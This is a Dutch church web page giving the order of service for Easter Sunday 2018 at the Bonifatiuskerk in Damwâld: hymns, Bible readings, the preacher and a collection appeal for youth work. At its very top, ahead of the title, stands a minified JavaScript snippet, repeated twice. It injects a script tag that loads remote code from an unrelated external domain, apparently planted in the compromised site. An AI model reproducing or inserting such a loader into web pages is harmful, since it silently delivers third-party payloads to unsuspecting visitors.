;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Eerste Paasdag - PKN Damwâld
zondag 1 april 2018
09:30 uur

Eerste Paasdag

Informatie

Voorganger:Ds. M.J. Koppe, Dokkum
Organist:Nienke van der Heide-Visser
Liturgie
lied voor de dienst gez 218 : 1,2,3,7 en 8
Welkom en mededelingen
We zingen: gez 221 : 1 en 2
Stil gebed, votum en groet
We zingen: ElB 374 : 1,2 en 3
Gebed om de H.Geest
We lezen: Johannes 20 : 1-18
We zingen: gez 215 : 1,2 en 3
We lezen: Joh. 20 : 19 – 23
We zingen: gez 217 : 1,2 en 3
Verkondiging .
We zingen: ElB 132 : 1,2 en 3
We zingen: ElB 122 : 1 t/m 4
Dankzegging en voorbeden
Collecte
Slotlied ElB 357 : 1,3,4 en 5
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: JOP

Pasen: Collecte Protestantse Kerk - Jeugdwerk (JOP)
Op een zondagmiddag in Spijkenisse lopen een moeder en haar dochter schuchter de kerk binnen waar Kliederkerk plaatsvindt. Al snel verliezen ze zich in de creatieve werkvormen waarmee ze spelenderwijs een bijbelverhaal ontdekken. Ook genieten ze van een vertelling en een gezamenlijke maaltijd. Ze hebben weinig met de kerk, maar willen wel meer weten, vertellen ze. Na dit eerste bezoek komen ze regelmatig terug en nemen zelfs klasgenootjes en buurmeisjes mee. Afgelopen vijf jaar zijn meer dan 100 Kliederkerken gestart. JOP, Jong Protestant, brengt deze Kliederkerken via digitale en fysieke ontmoetingen met elkaar in verbinding. Ook ondersteunt JOP Kliederkerken met tips en advies om verder te groeien in geloof en creativiteit. Collecteert mee en help Kliederkerken om uitnodigende gemeenschappen te zijn voor alle leeftijden.

Tweede collecte: Kerk
Uitganscollecte: Kerk